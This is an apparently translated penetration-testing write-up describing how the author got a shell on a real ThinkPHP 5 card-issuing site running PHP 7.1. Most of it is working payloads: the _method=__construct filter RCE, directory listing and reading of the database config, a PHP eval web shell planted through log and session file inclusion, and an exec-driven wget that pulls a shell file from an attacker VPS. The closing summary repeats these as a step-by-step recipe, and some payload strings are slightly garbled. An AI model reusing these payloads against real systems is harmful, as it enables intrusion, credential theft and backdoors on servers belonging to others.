Title: Testing the getshell method of tp5 website in a practical battle

0x00 Introduction

There were fewer sites in contact with tp5 before, and I only knew how to use the RCE vulnerability getshell. In the recent penetration of a card issuing platform, due to the limitations of the php version, it is impossible to use RCE's payload to get the shell directly. So, combined with the website, test as much getshell method in the tp5+php7.1 environment as possible.

0x02 Text

After getting the site, visit the homepage as follows

During the test, it was found that it was a thinkphp site, and the error was reported as follows

However, I can't see the specific version, and I'm not sure if there is RCE, so I'll try it with exp

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo

It was found that the execution was successful, and many functions were disabled by disable_function

Generally, if the php version is lower than 7.1, then just use exp to write shell. The method is to directly use the following exp to write shell.

s=file_put_contents('test.php','?php phpinfo();')_method=__constructmethod=POSTfilter[]=assert

However, assert is used in this exp, and the above shows that the php version is 7.1.33. This version can no longer use assert, so this method cannot be used here.

The exp above method two cannot write shell, but phpinfo is executed, so RCE exists. So I thought that I could read the database account password by reading the file, and then find phpmyadmin, and then write a shell through the database.

So first find the website root directory through the information in phpinfo, then use the scandir function to traverse the directory and find the database configuration file

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=path

Then read the file through the highlight_file function

_method=__constructfilter[]=highlight_filemethod=GETget[]=read file path

After getting the database information, I looked for whether phpmyadmin existed, and finally found that it was not, so this method also failed.

Searching for the getshell method of tp5 in the forum, I found that many masters said that they can use logs or sessions to include methods, but they have never been exposed to them before and don’t know the specific ones, so I searched and tried it.

Method 3 attempt log contains

First write the shell and enter the log

_method=__constructmethod=getfilter[]=call_user_funcserver[]=phpinfoget[]=?php eval($_POST['c'])?

Then getshell by log inclusion

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=./data/runtime/log/202110/17.logc=phpinfo();

Failed, the methods included in the log are not available.

Method 4 Try to getshell using the method contained in session

First, set the session session and pass in a sentence Trojan

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['c'])?server[]=1

Then directly use the file to include the session file. The session file of tp5 is usually under /tmp, and the file name is session_sessionid (this sessionod is in the cookie)

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo();

Successfully executed, then connect it through the ant sword

Success getshell

www permissions

I got the shell on Method 5, but I still tried again whether there are other methods that can getshell. I saw an article because exec is not disabled in disable_function, and then I used exec to download the shell file from vps.

So I carefully looked at the disabled function in disable_function. By chance, I found that exec was not disabled either, so I would try it

First create a test.php on vps and open a port with python

python -m SimpleHTTPServer 8888

Download file from vps

s=wget vps/test.php_method=__constructmethod=getfilter[]=exec

Successfully downloaded to the target machine

0x03  Summary

1. Enter the wrong path on the target website path, and the error page of the website is thinkphp, and the version is not displayed.

2. Enter the RCE poc of tp5.x to show that phpinfo is successful, and the disabled_function disables many functions and the php version is 7.1.x version

http://www.xxx.com/index.php?s=captcha

post:

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo

3. The following method can directly obtain the shell (tp5.x+php7.1.x)

Method 1: (php requirements are lower than php7.1)

http://www.xxx.com/index.php?s=captcha

post:

s=file_put_contents('test.php','?php phpinfo();')_method=__constructmethod=POSTfilter[]=assert(

Method 2: (tp5.x+php7.1.x)

First, find the website root directory through the information in phpinfo, then use the scandir function to traverse the directory and find the database configuration file

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo //Show the website directory is /www/wwwroot/idj/, and the directory traversal is obtained from the website configuration root directory (/www/wwwroot/idj/data/conf) where the database connection exists is database.php

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/data/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/data/conf

Then read the file through the highlight_file function and read the connection username and password to the database

_method=__constructfilter[]=highlight_filemethod=GETget[]=/www/wwwroot/idj/data/conf/database.php

If you can find that the website has phpmyadmin, you can enter it through the database user and password and write to the shell through mysql log

Method 3: (tp5.x+php7.1.x, log contains)

First write the shell and enter the log

_method=__constructmethod=getfilter[]=call_user_funcserver[]=phpinfoget[]=?php eval($_POST['c'])?

Then getshell by log inclusion

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=./data/runtime/log/202110/17.logc=phpinfo();

Method 4: (tp5.x + php7.1.x, use the method contained in session to getshe)

First, set the session session and pass in a sentence Trojan

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['c'])?server[]=1

Then directly use the file to include the session file. The session file of tp5 is usually under /tmp, and the file name is session_sessionid (this sessionod is in the cookie)

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo();

Method 4: (tp5.x+php7.1.x, the disabled exec function is not used in disable_function)

First create a test.php on vps and open a port with python

python -m SimpleHTTPServer 8888

Download file from vps

s=wget http://www.vps.com/test.php_method=__constructmethod=getfilter[]=exec

Original link: https://xz.aliyun.com/t/10397